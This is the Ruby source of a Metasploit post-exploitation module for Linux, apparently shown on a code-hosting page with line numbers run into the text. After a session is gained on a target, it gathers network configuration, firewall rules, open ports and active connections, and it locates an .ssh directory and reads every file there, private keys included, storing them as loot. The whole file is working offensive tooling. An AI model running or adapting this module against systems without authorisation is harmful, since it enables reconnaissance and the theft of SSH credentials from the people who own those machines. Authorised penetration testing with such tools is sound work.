Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/linux/gather/enum_network.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::Priv8include Msf::Post::Linux::System910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Linux Gather Network Information',15'Description' => %q{16This module gathers network information from the target system17IPTables rules, interfaces, wireless information, open and listening18ports, active network connections, DNS information and SSH information.19},20'License' => MSF_LICENSE,21'Author' => [22'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing23'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux24],25'Platform' => ['linux'],26'SessionTypes' => ['shell', 'meterpreter']27)28)29end3031# Run Method for when run command is issued32def run33print_status("Running module against #{get_hostname} (#{session.session_host})")3435user = execute('/usr/bin/whoami')36print_status("Module running as #{user}")3738# Collect data39distro = get_sysinfo40print_good('Info:')41print_good("\t#{distro[:version]}")42print_good("\t#{distro[:kernel]}")4344print_status('Collecting data...')4546nconfig = execute('/sbin/ifconfig -a')47routes = execute('/sbin/route -e')48iptables = execute('/sbin/iptables -L')49iptables_nat = execute('/sbin/iptables -L -t nat')50iptables_man = execute('/sbin/iptables -L -t mangle')51resolv = cat_file('/etc/resolv.conf')52sshd_conf = cat_file('/etc/ssh/sshd_config')53hosts = cat_file('/etc/hosts')54connections = execute('/usr/bin/lsof -nPi')55wireless = execute('/sbin/iwconfig')56open_ports = execute('/bin/netstat -tulpn')57updown = execute('ls -R /etc/network')5859ssh_keys = get_ssh_keys6061# Save Enumerated data62save('Network config', nconfig)63save('Route table', routes)64save('Firewall config', iptables.to_s + iptables_nat.to_s + iptables_man.to_s)65save('DNS config', resolv)66save('SSHD config', sshd_conf)67save('Host file', hosts)68save('SSH keys', ssh_keys) unless ssh_keys.empty?69save('Active connections', connections)70save('Wireless information', wireless)71save('Listening ports', open_ports)72save('If-Up/If-Down', updown)73end7475# Save enumerated data76def save(msg, data, ctype = 'text/plain')77unless data && !data.empty?78print_bad("Unable to get data for #{msg}")79return80end81ltype = 'linux.enum.network'82loot = store_loot(ltype, ctype, session, data, nil, msg)83print_good("#{msg} stored in #{loot}")84end8586def execute(cmd)87verification_token = Rex::Text.rand_text_alpha(8)88vprint_status("Execute: #{cmd}")89output = cmd_exec(cmd + " || echo #{verification_token}")90return nil if output.include?(verification_token)9192return output93end9495def cat_file(filename)96vprint_status("Download: #{filename}")97output = read_file(filename)98return output99end100101def get_ssh_keys102keys = []103104# Look for .ssh folder, "~/" might not work everytime105vprint_status('Execute: /usr/bin/find / -maxdepth 3 -name .ssh')106dirs = cmd_exec('/usr/bin/find / -maxdepth 3 -name .ssh').split("\n")107ssh_base = ''108dirs.each do |d|109if d =~ %r{(^/)(.*)\.ssh$}110ssh_base = d111break112end113end114115# We didn't find .ssh :-(116return [] if ssh_base == ''117118# List all the files under .ssh/119files = execute("/bin/ls -a #{ssh_base}").chomp.split120121files.each do |k|122next if k =~ /^(\.+)$/123124this_key = cat_file("#{ssh_base}/#{k}")125keys << this_key126end127128return keys129end130end131132133